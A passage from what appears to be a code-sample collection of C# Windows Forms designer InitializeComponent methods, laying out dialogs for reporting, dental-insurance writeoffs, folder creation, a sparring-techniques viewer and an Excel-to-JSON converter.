     this.label2.Size     = new System.Drawing.Size(239, 19);
     this.label2.TabIndex = 5;
     this.label2.Text     = "Select an available report below:";
     //
     // pendingOnlineActivationLinkLabel
     //
     this.pendingOnlineActivationLinkLabel.AutoSize     = true;
     this.pendingOnlineActivationLinkLabel.Font         = new System.Drawing.Font("Tahoma", 11.25F, System.Drawing.FontStyle.Regular, System.Drawing.GraphicsUnit.Point, ((byte)(0)));
     this.pendingOnlineActivationLinkLabel.Location     = new System.Drawing.Point(107, 126);
     this.pendingOnlineActivationLinkLabel.Name         = "pendingOnlineActivationLinkLabel";
     this.pendingOnlineActivationLinkLabel.Size         = new System.Drawing.Size(168, 18);
     this.pendingOnlineActivationLinkLabel.TabIndex     = 1;
     this.pendingOnlineActivationLinkLabel.TabStop      = true;
     this.pendingOnlineActivationLinkLabel.Text         = "Pending Online Complete";
     this.pendingOnlineActivationLinkLabel.LinkClicked += new System.Windows.Forms.LinkLabelLinkClickedEventHandler(this.pendingOnlineActivationLinkLabel_LinkClicked);
     //
     // linkLabel4
     //
     this.linkLabel4.AutoSize     = true;
     this.linkLabel4.Font         = new System.Drawing.Font("Tahoma", 11.25F, System.Drawing.FontStyle.Regular, System.Drawing.GraphicsUnit.Point, ((byte)(0)));
     this.linkLabel4.Location     = new System.Drawing.Point(107, 166);
     this.linkLabel4.Name         = "linkLabel4";
     this.linkLabel4.Size         = new System.Drawing.Size(208, 18);
     this.linkLabel4.TabIndex     = 3;
     this.linkLabel4.TabStop      = true;
     this.linkLabel4.Text         = "Newspapers without Serial Info";
     this.linkLabel4.LinkClicked += new System.Windows.Forms.LinkLabelLinkClickedEventHandler(this.linkLabel4_LinkClicked);
     //
     // panel1
     //
     this.panel1.Anchor = ((System.Windows.Forms.AnchorStyles)((((System.Windows.Forms.AnchorStyles.Top | System.Windows.Forms.AnchorStyles.Bottom)
                                                                 | System.Windows.Forms.AnchorStyles.Left)
                                                                | System.Windows.Forms.AnchorStyles.Right)));
     this.panel1.BackColor   = System.Drawing.SystemColors.ControlLightLight;
     this.panel1.BorderStyle = System.Windows.Forms.BorderStyle.FixedSingle;
     this.panel1.Controls.Add(this.trackingBoxLinkLabel);
     this.panel1.Controls.Add(this.customReportLinkLabel);
     this.panel1.Controls.Add(this.aggregationSpaceUsedLinkLabel);
     this.panel1.Controls.Add(this.label2);
     this.panel1.Controls.Add(this.linkLabel4);
     this.panel1.Controls.Add(this.pendingOnlineActivationLinkLabel);
     this.panel1.Location = new System.Drawing.Point(21, 44);
     this.panel1.Name     = "panel1";
     this.panel1.Size     = new System.Drawing.Size(430, 308);
     this.panel1.TabIndex = 0;
     //
     // customReportLinkLabel
     //
     this.customReportLinkLabel.AutoSize     = true;
     this.customReportLinkLabel.Font         = new System.Drawing.Font("Tahoma", 11.25F, System.Drawing.FontStyle.Regular, System.Drawing.GraphicsUnit.Point, ((byte)(0)));
     this.customReportLinkLabel.Location     = new System.Drawing.Point(107, 86);
     this.customReportLinkLabel.Name         = "customReportLinkLabel";
     this.customReportLinkLabel.Size         = new System.Drawing.Size(173, 18);
     this.customReportLinkLabel.TabIndex     = 0;
     this.customReportLinkLabel.TabStop      = true;
     this.customReportLinkLabel.Text         = "Ad Hoc Report Generator";
     this.customReportLinkLabel.LinkClicked += new System.Windows.Forms.LinkLabelLinkClickedEventHandler(this.customReportLinkLabel_LinkClicked);
     //
     // aggregationSpaceUsedLinkLabel
     //
     this.aggregationSpaceUsedLinkLabel.AutoSize     = true;
     this.aggregationSpaceUsedLinkLabel.Font         = new System.Drawing.Font("Tahoma", 11.25F, System.Drawing.FontStyle.Regular, System.Drawing.GraphicsUnit.Point, ((byte)(0)));
     this.aggregationSpaceUsedLinkLabel.Location     = new System.Drawing.Point(106, 206);
     this.aggregationSpaceUsedLinkLabel.Name         = "aggregationSpaceUsedLinkLabel";
     this.aggregationSpaceUsedLinkLabel.Size         = new System.Drawing.Size(178, 18);
     this.aggregationSpaceUsedLinkLabel.TabIndex     = 4;
     this.aggregationSpaceUsedLinkLabel.TabStop      = true;
     this.aggregationSpaceUsedLinkLabel.Text         = "Aggregation Space Utilized";
     this.aggregationSpaceUsedLinkLabel.LinkClicked += new System.Windows.Forms.LinkLabelLinkClickedEventHandler(this.aggregationSpaceUsedLinkLabel_LinkClicked);
     //
     // exitButton
     //
     this.exitButton.Anchor          = ((System.Windows.Forms.AnchorStyles)((System.Windows.Forms.AnchorStyles.Bottom | System.Windows.Forms.AnchorStyles.Right)));
     this.exitButton.BackColor       = System.Drawing.Color.Transparent;
     this.exitButton.Button_Enabled  = true;
     this.exitButton.Button_Text     = "CLOSE";
     this.exitButton.Button_Type     = SobekCM.Management_Tool.Round_Button.Button_Type_Enum.Standard;
     this.exitButton.Font            = new System.Drawing.Font("Tahoma", 9F, System.Drawing.FontStyle.Bold, System.Drawing.GraphicsUnit.Point, ((byte)(0)));
     this.exitButton.Location        = new System.Drawing.Point(357, 358);
     this.exitButton.Name            = "exitButton";
     this.exitButton.Size            = new System.Drawing.Size(94, 26);
     this.exitButton.TabIndex        = 1;
     this.exitButton.Button_Pressed += new System.EventHandler(this.exitButton_Button_Pressed);
     //
     // trackingBoxLinkLabel
     //
     this.trackingBoxLinkLabel.AutoSize     = true;
     this.trackingBoxLinkLabel.Font         = new System.Drawing.Font("Tahoma", 11.25F, System.Drawing.FontStyle.Regular, System.Drawing.GraphicsUnit.Point, ((byte)(0)));
     this.trackingBoxLinkLabel.Location     = new System.Drawing.Point(107, 246);
     this.trackingBoxLinkLabel.Name         = "trackingBoxLinkLabel";
     this.trackingBoxLinkLabel.Size         = new System.Drawing.Size(156, 18);
     this.trackingBoxLinkLabel.TabIndex     = 6;
     this.trackingBoxLinkLabel.TabStop      = true;
     this.trackingBoxLinkLabel.Text         = "Tracking Boxes Report";
     this.trackingBoxLinkLabel.LinkClicked += new System.Windows.Forms.LinkLabelLinkClickedEventHandler(this.trackingBoxLinkLabel_LinkClicked);
     //
     // Reports_Form
     //
     this.AutoScaleBaseSize = new System.Drawing.Size(5, 14);
     this.BackColor         = System.Drawing.Color.FromArgb(((int)(((byte)(240)))), ((int)(((byte)(240)))), ((int)(((byte)(240)))));
     this.ClientSize        = new System.Drawing.Size(475, 411);
     this.Controls.Add(this.panel1);
     this.Controls.Add(this.exitButton);
     this.Controls.Add(this.mainLabel);
     this.Font          = new System.Drawing.Font("Tahoma", 8.25F, System.Drawing.FontStyle.Regular, System.Drawing.GraphicsUnit.Point, ((byte)(0)));
     this.Icon          = ((System.Drawing.Icon)(resources.GetObject("$this.Icon")));
     this.MaximizeBox   = false;
     this.MinimumSize   = new System.Drawing.Size(483, 418);
     this.Name          = "Reports_Form";
     this.StartPosition = System.Windows.Forms.FormStartPosition.CenterScreen;
     this.Text          = "Reporting Module";
     this.panel1.ResumeLayout(false);
     this.panel1.PerformLayout();
     this.ResumeLayout(false);
 }
Example #52
0
 /// <summary>
 /// Required method for Designer support - do not modify
 /// the contents of this method with the code editor.
 /// </summary>
 private void InitializeComponent()
 {
     System.ComponentModel.ComponentResourceManager resources = new System.ComponentModel.ComponentResourceManager(typeof(FormRpPPOwriteoffs));
     this.butCancel         = new OpenDental.UI.Button();
     this.butOK             = new OpenDental.UI.Button();
     this.date2             = new System.Windows.Forms.MonthCalendar();
     this.date1             = new System.Windows.Forms.MonthCalendar();
     this.labelTO           = new System.Windows.Forms.Label();
     this.radioIndividual   = new System.Windows.Forms.RadioButton();
     this.radioGroup        = new System.Windows.Forms.RadioButton();
     this.textCarrier       = new System.Windows.Forms.TextBox();
     this.label1            = new System.Windows.Forms.Label();
     this.groupBox3         = new System.Windows.Forms.GroupBox();
     this.label5            = new System.Windows.Forms.Label();
     this.radioWriteoffProc = new System.Windows.Forms.RadioButton();
     this.radioWriteoffPay  = new System.Windows.Forms.RadioButton();
     this.groupBox3.SuspendLayout();
     this.SuspendLayout();
     //
     // butCancel
     //
     this.butCancel.AdjustImageLocation = new System.Drawing.Point(0, 0);
     this.butCancel.Anchor       = ((System.Windows.Forms.AnchorStyles)((System.Windows.Forms.AnchorStyles.Bottom | System.Windows.Forms.AnchorStyles.Right)));
     this.butCancel.Autosize     = true;
     this.butCancel.BtnShape     = OpenDental.UI.enumType.BtnShape.Rectangle;
     this.butCancel.BtnStyle     = OpenDental.UI.enumType.XPStyle.Silver;
     this.butCancel.CornerRadius = 4F;
     this.butCancel.DialogResult = System.Windows.Forms.DialogResult.Cancel;
     this.butCancel.Location     = new System.Drawing.Point(625, 330);
     this.butCancel.Name         = "butCancel";
     this.butCancel.Size         = new System.Drawing.Size(75, 26);
     this.butCancel.TabIndex     = 0;
     this.butCancel.Text         = "&Cancel";
     this.butCancel.Click       += new System.EventHandler(this.butCancel_Click);
     //
     // butOK
     //
     this.butOK.AdjustImageLocation = new System.Drawing.Point(0, 0);
     this.butOK.Anchor       = ((System.Windows.Forms.AnchorStyles)((System.Windows.Forms.AnchorStyles.Bottom | System.Windows.Forms.AnchorStyles.Right)));
     this.butOK.Autosize     = true;
     this.butOK.BtnShape     = OpenDental.UI.enumType.BtnShape.Rectangle;
     this.butOK.BtnStyle     = OpenDental.UI.enumType.XPStyle.Silver;
     this.butOK.CornerRadius = 4F;
     this.butOK.Location     = new System.Drawing.Point(625, 289);
     this.butOK.Name         = "butOK";
     this.butOK.Size         = new System.Drawing.Size(75, 26);
     this.butOK.TabIndex     = 1;
     this.butOK.Text         = "&OK";
     this.butOK.Click       += new System.EventHandler(this.butOK_Click);
     //
     // date2
     //
     this.date2.Location          = new System.Drawing.Point(289, 36);
     this.date2.MaxSelectionCount = 1;
     this.date2.Name     = "date2";
     this.date2.TabIndex = 30;
     //
     // date1
     //
     this.date1.Location          = new System.Drawing.Point(33, 36);
     this.date1.MaxSelectionCount = 1;
     this.date1.Name     = "date1";
     this.date1.TabIndex = 29;
     //
     // labelTO
     //
     this.labelTO.Location  = new System.Drawing.Point(223, 36);
     this.labelTO.Name      = "labelTO";
     this.labelTO.Size      = new System.Drawing.Size(51, 23);
     this.labelTO.TabIndex  = 31;
     this.labelTO.Text      = "TO";
     this.labelTO.TextAlign = System.Drawing.ContentAlignment.MiddleCenter;
     //
     // radioIndividual
     //
     this.radioIndividual.Checked  = true;
     this.radioIndividual.Location = new System.Drawing.Point(33, 227);
     this.radioIndividual.Name     = "radioIndividual";
     this.radioIndividual.Size     = new System.Drawing.Size(200, 19);
     this.radioIndividual.TabIndex = 32;
     this.radioIndividual.TabStop  = true;
     this.radioIndividual.Text     = "Individual Claims";
     this.radioIndividual.UseVisualStyleBackColor = true;
     //
     // radioGroup
     //
     this.radioGroup.Location = new System.Drawing.Point(33, 250);
     this.radioGroup.Name     = "radioGroup";
     this.radioGroup.Size     = new System.Drawing.Size(200, 19);
     this.radioGroup.TabIndex = 33;
     this.radioGroup.Text     = "Group by Carrier";
     this.radioGroup.UseVisualStyleBackColor = true;
     //
     // textCarrier
     //
     this.textCarrier.Location = new System.Drawing.Point(33, 309);
     this.textCarrier.Name     = "textCarrier";
     this.textCarrier.Size     = new System.Drawing.Size(178, 20);
     this.textCarrier.TabIndex = 34;
     //
     // label1
     //
     this.label1.Location  = new System.Drawing.Point(32, 283);
     this.label1.Name      = "label1";
     this.label1.Size      = new System.Drawing.Size(257, 22);
     this.label1.TabIndex  = 35;
     this.label1.Text      = "Enter a few letters of the carrier to limit results";
     this.label1.TextAlign = System.Drawing.ContentAlignment.BottomLeft;
     //
     // groupBox3
     //
     this.groupBox3.Controls.Add(this.label5);
     this.groupBox3.Controls.Add(this.radioWriteoffProc);
     this.groupBox3.Controls.Add(this.radioWriteoffPay);
     this.groupBox3.Location = new System.Drawing.Point(289, 227);
     this.groupBox3.Name     = "groupBox3";
     this.groupBox3.Size     = new System.Drawing.Size(281, 95);
     this.groupBox3.TabIndex = 48;
     this.groupBox3.TabStop  = false;
     this.groupBox3.Text     = "Show Insurance Writeoffs";
     //
     // label5
     //
     this.label5.Location = new System.Drawing.Point(6, 71);
     this.label5.Name     = "label5";
     this.label5.Size     = new System.Drawing.Size(269, 17);
     this.label5.TabIndex = 2;
     this.label5.Text     = "(this is discussed in the PPO section of the manual)";
     //
     // radioWriteoffProc
     //
     this.radioWriteoffProc.CheckAlign = System.Drawing.ContentAlignment.TopLeft;
     this.radioWriteoffProc.Location   = new System.Drawing.Point(9, 41);
     this.radioWriteoffProc.Name       = "radioWriteoffProc";
     this.radioWriteoffProc.Size       = new System.Drawing.Size(244, 23);
     this.radioWriteoffProc.TabIndex   = 1;
     this.radioWriteoffProc.Text       = "Using procedure date.";
     this.radioWriteoffProc.TextAlign  = System.Drawing.ContentAlignment.TopLeft;
     this.radioWriteoffProc.UseVisualStyleBackColor = true;
     //
     // radioWriteoffPay
     //
     this.radioWriteoffPay.CheckAlign = System.Drawing.ContentAlignment.TopLeft;
     this.radioWriteoffPay.Checked    = true;
     this.radioWriteoffPay.Location   = new System.Drawing.Point(9, 20);
     this.radioWriteoffPay.Name       = "radioWriteoffPay";
     this.radioWriteoffPay.Size       = new System.Drawing.Size(244, 23);
     this.radioWriteoffPay.TabIndex   = 0;
     this.radioWriteoffPay.TabStop    = true;
     this.radioWriteoffPay.Text       = "Using insurance payment date.";
     this.radioWriteoffPay.TextAlign  = System.Drawing.ContentAlignment.TopLeft;
     this.radioWriteoffPay.UseVisualStyleBackColor = true;
     //
     // FormRpPPOwriteoffs
     //
     this.AutoScaleBaseSize = new System.Drawing.Size(5, 13);
     this.CancelButton      = this.butCancel;
     this.ClientSize        = new System.Drawing.Size(725, 379);
     this.Controls.Add(this.groupBox3);
     this.Controls.Add(this.label1);
     this.Controls.Add(this.textCarrier);
     this.Controls.Add(this.radioGroup);
     this.Controls.Add(this.radioIndividual);
     this.Controls.Add(this.date2);
     this.Controls.Add(this.date1);
     this.Controls.Add(this.labelTO);
     this.Controls.Add(this.butOK);
     this.Controls.Add(this.butCancel);
     this.Icon          = ((System.Drawing.Icon)(resources.GetObject("$this.Icon")));
     this.MaximizeBox   = false;
     this.MinimizeBox   = false;
     this.Name          = "FormRpPPOwriteoffs";
     this.ShowInTaskbar = false;
     this.StartPosition = System.Windows.Forms.FormStartPosition.CenterScreen;
     this.Text          = "PPO Writeoffs";
     this.Load         += new System.EventHandler(this.FormRpPPOwriteoffs_Load);
     this.groupBox3.ResumeLayout(false);
     this.ResumeLayout(false);
     this.PerformLayout();
 }
Example #53
0
 /// <summary>
 /// Required method for Designer support - do not modify
 /// the contents of this method with the code editor.
 /// </summary>
 private void InitializeComponent()
 {
     System.ComponentModel.ComponentResourceManager resources = new System.ComponentModel.ComponentResourceManager(typeof(spTechniquesView));
     this.BTNclose     = new System.Windows.Forms.Button();
     this.SpTechText   = new System.Windows.Forms.RichTextBox();
     this.label1       = new System.Windows.Forms.Label();
     this.label2       = new System.Windows.Forms.Label();
     this.label3       = new System.Windows.Forms.Label();
     this.label4       = new System.Windows.Forms.Label();
     this.beltLabelTop = new System.Windows.Forms.Label();
     this.SpTechLabel5 = new System.Windows.Forms.Label();
     this.flashCardBtn = new System.Windows.Forms.Button();
     this.SuspendLayout();
     //
     // BTNclose
     //
     this.BTNclose.Location = new System.Drawing.Point(696, 496);
     this.BTNclose.Name     = "BTNclose";
     this.BTNclose.Size     = new System.Drawing.Size(64, 24);
     this.BTNclose.TabIndex = 2;
     this.BTNclose.Text     = "Close";
     this.BTNclose.Click   += new System.EventHandler(this.BTNclose_Click);
     //
     // SpTechText
     //
     this.SpTechText.BackColor = System.Drawing.Color.WhiteSmoke;
     this.SpTechText.Location  = new System.Drawing.Point(32, 72);
     this.SpTechText.Name      = "SpTechText";
     this.SpTechText.ReadOnly  = true;
     this.SpTechText.Size      = new System.Drawing.Size(720, 328);
     this.SpTechText.TabIndex  = 3;
     this.SpTechText.Text      = "";
     //
     // label1
     //
     this.label1.BackColor = System.Drawing.Color.Transparent;
     this.label1.Location  = new System.Drawing.Point(256, 432);
     this.label1.Name      = "label1";
     this.label1.Size      = new System.Drawing.Size(112, 16);
     this.label1.TabIndex  = 4;
     this.label1.Text      = "(cs) = Cat Stance";
     //
     // label2
     //
     this.label2.BackColor = System.Drawing.Color.Transparent;
     this.label2.Location  = new System.Drawing.Point(256, 456);
     this.label2.Name      = "label2";
     this.label2.Size      = new System.Drawing.Size(112, 16);
     this.label2.TabIndex  = 5;
     this.label2.Text      = "(hs) = Horse Stance";
     //
     // label3
     //
     this.label3.BackColor = System.Drawing.Color.Transparent;
     this.label3.Location  = new System.Drawing.Point(400, 432);
     this.label3.Name      = "label3";
     this.label3.Size      = new System.Drawing.Size(112, 16);
     this.label3.TabIndex  = 6;
     this.label3.Text      = "(bs) = Bow Stance";
     //
     // label4
     //
     this.label4.BackColor = System.Drawing.Color.Transparent;
     this.label4.Location  = new System.Drawing.Point(400, 456);
     this.label4.Name      = "label4";
     this.label4.Size      = new System.Drawing.Size(112, 16);
     this.label4.TabIndex  = 7;
     this.label4.Text      = "(ns) = Natural Stance";
     //
     // beltLabelTop
     //
     this.beltLabelTop.BackColor = System.Drawing.Color.Transparent;
     this.beltLabelTop.Font      = new System.Drawing.Font("Tempus Sans ITC", 14.25F, System.Drawing.FontStyle.Bold, System.Drawing.GraphicsUnit.Point, ((byte)(0)));
     this.beltLabelTop.Location  = new System.Drawing.Point(280, 8);
     this.beltLabelTop.Name      = "beltLabelTop";
     this.beltLabelTop.Size      = new System.Drawing.Size(200, 24);
     this.beltLabelTop.TabIndex  = 8;
     this.beltLabelTop.Text      = "Sparring Techniques";
     //
     // SpTechLabel5
     //
     this.SpTechLabel5.BackColor = System.Drawing.Color.Transparent;
     this.SpTechLabel5.Font      = new System.Drawing.Font("Tempus Sans ITC", 12F, System.Drawing.FontStyle.Bold, System.Drawing.GraphicsUnit.Point, ((byte)(0)));
     this.SpTechLabel5.Location  = new System.Drawing.Point(256, 40);
     this.SpTechLabel5.Name      = "SpTechLabel5";
     this.SpTechLabel5.Size      = new System.Drawing.Size(232, 24);
     this.SpTechLabel5.TabIndex  = 9;
     this.SpTechLabel5.TextAlign = System.Drawing.ContentAlignment.MiddleCenter;
     //
     // flashCardBtn
     //
     this.flashCardBtn.Location = new System.Drawing.Point(336, 496);
     this.flashCardBtn.Name     = "flashCardBtn";
     this.flashCardBtn.Size     = new System.Drawing.Size(88, 24);
     this.flashCardBtn.TabIndex = 10;
     this.flashCardBtn.Text     = "Flash Cards";
     this.flashCardBtn.Click   += new System.EventHandler(this.flashCardBtn_Click);
     //
     // spTechniquesView
     //
     this.AutoScaleBaseSize = new System.Drawing.Size(5, 13);
     this.BackColor         = System.Drawing.SystemColors.Control;
     this.BackgroundImage   = ((System.Drawing.Image)(resources.GetObject("$this.BackgroundImage")));
     this.ClientSize        = new System.Drawing.Size(787, 548);
     this.Controls.Add(this.flashCardBtn);
     this.Controls.Add(this.SpTechLabel5);
     this.Controls.Add(this.beltLabelTop);
     this.Controls.Add(this.label4);
     this.Controls.Add(this.label3);
     this.Controls.Add(this.label2);
     this.Controls.Add(this.label1);
     this.Controls.Add(this.SpTechText);
     this.Controls.Add(this.BTNclose);
     this.Icon          = ((System.Drawing.Icon)(resources.GetObject("$this.Icon")));
     this.Name          = "spTechniquesView";
     this.StartPosition = System.Windows.Forms.FormStartPosition.CenterParent;
     this.Text          = "SpTechs";
     this.ResumeLayout(false);
 }
Example #54
0
 /// <summary>
 /// Required method for Designer support - do not modify
 /// the contents of this method with the code editor.
 /// </summary>
 private void InitializeComponent()
 {
     System.ComponentModel.ComponentResourceManager resources = new System.ComponentModel.ComponentResourceManager(typeof(FormAtoZFoldersCreate));
     this.butCancel    = new OpenDental.UI.Button();
     this.butOK        = new OpenDental.UI.Button();
     this.label1       = new System.Windows.Forms.Label();
     this.label2       = new System.Windows.Forms.Label();
     this.textLocation = new System.Windows.Forms.TextBox();
     this.textName     = new System.Windows.Forms.TextBox();
     this.label3       = new System.Windows.Forms.Label();
     this.SuspendLayout();
     //
     // butCancel
     //
     this.butCancel.AdjustImageLocation = new System.Drawing.Point(0, 0);
     this.butCancel.Anchor       = ((System.Windows.Forms.AnchorStyles)((System.Windows.Forms.AnchorStyles.Bottom | System.Windows.Forms.AnchorStyles.Right)));
     this.butCancel.Autosize     = true;
     this.butCancel.BtnShape     = OpenDental.UI.enumType.BtnShape.Rectangle;
     this.butCancel.BtnStyle     = OpenDental.UI.enumType.XPStyle.Silver;
     this.butCancel.CornerRadius = 4F;
     this.butCancel.Location     = new System.Drawing.Point(592, 222);
     this.butCancel.Name         = "butCancel";
     this.butCancel.Size         = new System.Drawing.Size(75, 26);
     this.butCancel.TabIndex     = 0;
     this.butCancel.Text         = "&Cancel";
     this.butCancel.Click       += new System.EventHandler(this.butCancel_Click);
     //
     // butOK
     //
     this.butOK.AdjustImageLocation = new System.Drawing.Point(0, 0);
     this.butOK.Anchor       = ((System.Windows.Forms.AnchorStyles)((System.Windows.Forms.AnchorStyles.Bottom | System.Windows.Forms.AnchorStyles.Right)));
     this.butOK.Autosize     = true;
     this.butOK.BtnShape     = OpenDental.UI.enumType.BtnShape.Rectangle;
     this.butOK.BtnStyle     = OpenDental.UI.enumType.XPStyle.Silver;
     this.butOK.CornerRadius = 4F;
     this.butOK.Location     = new System.Drawing.Point(592, 181);
     this.butOK.Name         = "butOK";
     this.butOK.Size         = new System.Drawing.Size(75, 26);
     this.butOK.TabIndex     = 1;
     this.butOK.Text         = "&OK";
     this.butOK.Click       += new System.EventHandler(this.butOK_Click);
     //
     // label1
     //
     this.label1.Location = new System.Drawing.Point(24, 23);
     this.label1.Name     = "label1";
     this.label1.Size     = new System.Drawing.Size(578, 76);
     this.label1.TabIndex = 2;
     this.label1.Text     = resources.GetString("label1.Text");
     //
     // label2
     //
     this.label2.Location  = new System.Drawing.Point(26, 115);
     this.label2.Name      = "label2";
     this.label2.Size      = new System.Drawing.Size(184, 18);
     this.label2.TabIndex  = 3;
     this.label2.Text      = "Location of new folder";
     this.label2.TextAlign = System.Drawing.ContentAlignment.TopRight;
     //
     // textLocation
     //
     this.textLocation.Location = new System.Drawing.Point(214, 112);
     this.textLocation.Name     = "textLocation";
     this.textLocation.Size     = new System.Drawing.Size(323, 20);
     this.textLocation.TabIndex = 4;
     this.textLocation.Text     = "C:\\";
     //
     // textName
     //
     this.textName.Location = new System.Drawing.Point(214, 148);
     this.textName.Name     = "textName";
     this.textName.Size     = new System.Drawing.Size(206, 20);
     this.textName.TabIndex = 6;
     this.textName.Text     = "OpenDentImages";
     //
     // label3
     //
     this.label3.Location  = new System.Drawing.Point(26, 151);
     this.label3.Name      = "label3";
     this.label3.Size      = new System.Drawing.Size(184, 18);
     this.label3.TabIndex  = 5;
     this.label3.Text      = "Folder name";
     this.label3.TextAlign = System.Drawing.ContentAlignment.TopRight;
     //
     // FormAtoZFoldersCreate
     //
     this.AutoScaleBaseSize = new System.Drawing.Size(5, 13);
     this.ClientSize        = new System.Drawing.Size(719, 273);
     this.Controls.Add(this.textName);
     this.Controls.Add(this.label3);
     this.Controls.Add(this.textLocation);
     this.Controls.Add(this.label2);
     this.Controls.Add(this.label1);
     this.Controls.Add(this.butOK);
     this.Controls.Add(this.butCancel);
     this.Icon          = ((System.Drawing.Icon)(resources.GetObject("$this.Icon")));
     this.MaximizeBox   = false;
     this.MinimizeBox   = false;
     this.Name          = "FormAtoZFoldersCreate";
     this.ShowInTaskbar = false;
     this.StartPosition = System.Windows.Forms.FormStartPosition.CenterScreen;
     this.Text          = "Create AtoZ Folder";
     this.Load         += new System.EventHandler(this.FormAtoZFoldersCreate_Load);
     this.ResumeLayout(false);
     this.PerformLayout();
 }
Example #55
0
 /// <summary>
 /// Required method for Designer support - do not modify
 /// the contents of this method with the code editor.
 /// </summary>
 private void InitializeComponent()
 {
     System.ComponentModel.ComponentResourceManager resources = new System.ComponentModel.ComponentResourceManager(typeof(ExcelToJSON));
     this.label2           = new System.Windows.Forms.Label();
     this.groupBox1        = new System.Windows.Forms.GroupBox();
     this.check1           = new System.Windows.Forms.CheckBox();
     this.combo1           = new System.Windows.Forms.ComboBox();
     this.label1           = new System.Windows.Forms.Label();
     this.btnConvertToJSON = new System.Windows.Forms.Button();
     this.btnViewTemplate  = new System.Windows.Forms.Button();
     this.pictureBox3      = new System.Windows.Forms.PictureBox();
     this.groupBox1.SuspendLayout();
     ((System.ComponentModel.ISupportInitialize)(this.pictureBox3)).BeginInit();
     this.SuspendLayout();
     //
     // label2
     //
     this.label2.Font      = new System.Drawing.Font("Verdana", 8.25F, System.Drawing.FontStyle.Regular, System.Drawing.GraphicsUnit.Point, ((byte)(161)));
     this.label2.ForeColor = System.Drawing.SystemColors.ControlText;
     this.label2.Location  = new System.Drawing.Point(1, 105);
     this.label2.Name      = "label2";
     this.label2.Size      = new System.Drawing.Size(600, 100);
     this.label2.TabIndex  = 64;
     this.label2.Text      = "Click the \"Input Template\" button to view the input Excel document. Please note that the Microsoft Excel viewer or Microsoft Excel is required to view the Excel documnet.\n\nClick the \"Convert To JSON\" button to view the coverted JSON file.";
     this.label2.TextAlign = System.Drawing.ContentAlignment.MiddleLeft;
     //
     // groupBox1
     //
     this.groupBox1.Controls.Add(this.check1);
     this.groupBox1.Controls.Add(this.label1);
     this.groupBox1.Controls.Add(this.combo1);
     this.groupBox1.Controls.Add(this.btnConvertToJSON);
     this.groupBox1.Controls.Add(this.btnViewTemplate);
     this.groupBox1.Font     = new System.Drawing.Font("Microsoft Sans Serif", 8.25F, System.Drawing.FontStyle.Bold, System.Drawing.GraphicsUnit.Point, ((byte)(0)));
     this.groupBox1.Location = new System.Drawing.Point(5, 215);
     this.groupBox1.Name     = "groupBox1";
     this.groupBox1.Size     = new System.Drawing.Size(634, 148);
     this.groupBox1.TabIndex = 73;
     this.groupBox1.TabStop  = false;
     this.groupBox1.Text     = "Excel To JSON";
     //
     // check1
     //
     this.check1.Location = new System.Drawing.Point(388, 40);
     this.check1.Name     = "check1";
     this.check1.Size     = new System.Drawing.Size(136, 35);
     this.check1.TabIndex = 19;
     this.check1.Text     = "As Schema";
     this.check1.UseVisualStyleBackColor = true;
     //
     // combo1
     //
     this.combo1.Font = new System.Drawing.Font("Tahoma", 8.25F, System.Drawing.FontStyle.Regular, System.Drawing.GraphicsUnit.Point, ((byte)(0)));
     this.combo1.FormattingEnabled = true;
     this.combo1.Location          = new System.Drawing.Point(192, 42);
     this.combo1.Name     = "combo1";
     this.combo1.Size     = new System.Drawing.Size(173, 29);
     this.combo1.TabIndex = 17;
     //
     // label1
     //
     this.label1.Location = new System.Drawing.Point(100, 46);
     this.label1.Name     = "label1";
     this.label1.Size     = new System.Drawing.Size(70, 29);
     this.label1.TabIndex = 16;
     this.label1.Text     = "Convert";
     //
     // btnConvertToJSON
     //
     this.btnConvertToJSON.Font     = new System.Drawing.Font("Tahoma", 8.25F, System.Drawing.FontStyle.Regular, System.Drawing.GraphicsUnit.Point, ((byte)(0)));
     this.btnConvertToJSON.Location = new System.Drawing.Point(325, 97);
     this.btnConvertToJSON.Name     = "btnConvertToJSON";
     this.btnConvertToJSON.Size     = new System.Drawing.Size(186, 39);
     this.btnConvertToJSON.TabIndex = 13;
     this.btnConvertToJSON.Text     = "Convert To JSON";
     this.btnConvertToJSON.UseVisualStyleBackColor = true;
     this.btnConvertToJSON.Click += new System.EventHandler(this.btnConvertToJSON_Click);
     //
     // btnViewTemplate
     //
     this.btnViewTemplate.Font     = new System.Drawing.Font("Tahoma", 8.25F, System.Drawing.FontStyle.Regular, System.Drawing.GraphicsUnit.Point, ((byte)(0)));
     this.btnViewTemplate.Location = new System.Drawing.Point(104, 99);
     this.btnViewTemplate.Name     = "btnViewTemplate";
     this.btnViewTemplate.Size     = new System.Drawing.Size(186, 37);
     this.btnViewTemplate.TabIndex = 12;
     this.btnViewTemplate.Text     = "Input Template";
     this.btnViewTemplate.UseVisualStyleBackColor = true;
     this.btnViewTemplate.Click += new System.EventHandler(this.btnViewTemplate_Click);
     //
     // pictureBox3
     //
     this.pictureBox3.Image    = ((System.Drawing.Image)(resources.GetObject("pictureBox3.Image")));
     this.pictureBox3.Location = new System.Drawing.Point(0, 0);
     this.pictureBox3.Name     = "pictureBox3";
     this.pictureBox3.Size     = new System.Drawing.Size(639, 71);
     this.pictureBox3.SizeMode = System.Windows.Forms.PictureBoxSizeMode.AutoSize;
     this.pictureBox3.TabIndex = 75;
     this.pictureBox3.TabStop  = false;
     //
     // ReplaceOptions
     //
     this.AutoScaleBaseSize = new System.Drawing.Size(8, 19);
     this.BackColor         = System.Drawing.Color.White;
     this.ClientSize        = new System.Drawing.Size(643, 365);
     this.Controls.Add(this.label2);
     this.Controls.Add(this.groupBox1);
     this.Controls.Add(this.pictureBox3);
     this.FormBorderStyle = System.Windows.Forms.FormBorderStyle.FixedSingle;
     this.Icon            = ((System.Drawing.Icon)(resources.GetObject("$this.Icon")));
     this.MaximizeBox     = false;
     this.Name            = "Excel To JSON";
     this.StartPosition   = System.Windows.Forms.FormStartPosition.CenterScreen;
     this.Text            = "Excel To JSON";
     this.groupBox1.ResumeLayout(false);
     ((System.ComponentModel.ISupportInitialize)(this.pictureBox3)).EndInit();
     this.ResumeLayout(false);
     this.PerformLayout();
 }
Example #56
0
 /// <summary>
 /// Required method for Designer support - do not modify
 /// the contents of this method with the code editor.
 /// </summary>
 private void InitializeComponent()
 {
     System.ComponentModel.ComponentResourceManager resources = new System.ComponentModel.ComponentResourceManager(typeof(FormNotePick));
     this.butOK     = new OpenDental.UI.Button();
     this.gridMain  = new OpenDental.UI.ODGrid();
     this.label1    = new System.Windows.Forms.Label();
     this.textNote  = new System.Windows.Forms.TextBox();
     this.label2    = new System.Windows.Forms.Label();
     this.butCancel = new OpenDental.UI.Button();
